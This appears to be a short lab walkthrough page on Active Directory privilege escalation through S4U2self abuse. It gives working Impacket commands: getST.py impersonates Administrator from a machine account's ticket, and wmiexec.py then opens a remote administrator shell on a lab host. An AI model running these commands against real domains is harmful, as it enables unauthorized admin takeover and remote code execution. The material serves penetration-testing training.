machine account to administrator shell

s4u2self abuse

s4u2self abuse : we ask for a TGS as the Administrator domain user

export KRB5CCNAME=/workspace/acl/NYC.ccache
getST.py -self -impersonate "Administrator" -altservice "cifs/NYC.NewYork.local" -k -no-pass -dc-ip 192.168.56.10 "NewYork.local"/'NYC$'

And than we use that ticket to connect as administrator

export KRB5CCNAME=/workspace/acl/Administrator@cifs_NYC.NewYork.local@NewYork.LOCAL.ccache
wmiexec.py -k -no-pass NewYork.local/administrator@NYC.NewYork.local

PreviousGeneric all on user (CentralPark -> diego.Montenegro)NextSilver ticket

Last updated 2 years ago